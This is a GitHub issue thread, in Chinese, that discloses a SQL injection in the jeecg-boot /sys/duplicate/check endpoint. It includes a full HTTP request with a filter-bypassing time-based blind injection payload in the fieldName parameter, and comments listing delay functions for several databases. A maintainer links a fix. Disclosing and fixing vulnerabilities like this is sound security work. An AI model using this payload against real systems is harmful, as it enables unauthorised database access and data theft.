### ISSUE TITLE
sys/duplicate/check SQL注入

### ISSUE THREAD

**Issue by wealeson1** [jeecgboot/jeecg-boot#4737]
##### 版本号：
3.5.0

##### 前端版本：vue3版？还是 vue2版？
vue3版

##### 问题描述：
/sys/duplicate/check 接口SQL注入，checksql可以被绕过。

##### 截图&代码：
延时10秒。
<img width="1165" alt="image" src="https://user-images.githubusercontent.com/46522822/226792979-cf92d1d9-4579-433e-af85-1cb901480015.png">
不延时。
<img width="1173" alt="image" src="https://user-images.githubusercontent.com/46522822/226793052-a0d2b77b-82bf-43f2-94f3-38fbfc0a0932.png">
请求包。
```
GET /jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldName=1+and%09if(user(%20)='root@localhost',sleep(0),sleep(0))&fieldVal=1&dataId=asd HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Connection: close
Cache-Control: max-age=0
X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SU


```

#### 友情提示（为了提高issue处理效率）：
  - 未按格式要求发帖，会被直接删掉;
  - 描述过于简单或模糊，导致无法处理的，会被直接删掉；
  - 请自己初判问题描述是否清楚，是否方便我们调查处理；
  - 针对问题请说明是Online在线功能(需说明用的主题模板)，还是生成的代码功能；

**Comment by tygithub1** [comment]
然后呢

**Comment by healkerzk** [comment]
mysql是sleep，其他数据库可能不一样，如oracle是DECODE、DBMS_PIPE.RECEIVE_MESSAGE

**Comment by wealeson1** [comment]
大概整理了下可以造成延时的函数，可以考虑处理下。
BENCHMARK
PG_SLEEP
DBMS_LOCK.SLEEP
WAITFOR
DECODE
DBMS_PIPE.RECEIVE_MESSAGE

**Comment by zhangdaiscott** [comment]
漏洞修复方案
https://my.oschina.net/jeecg/blog/10107636
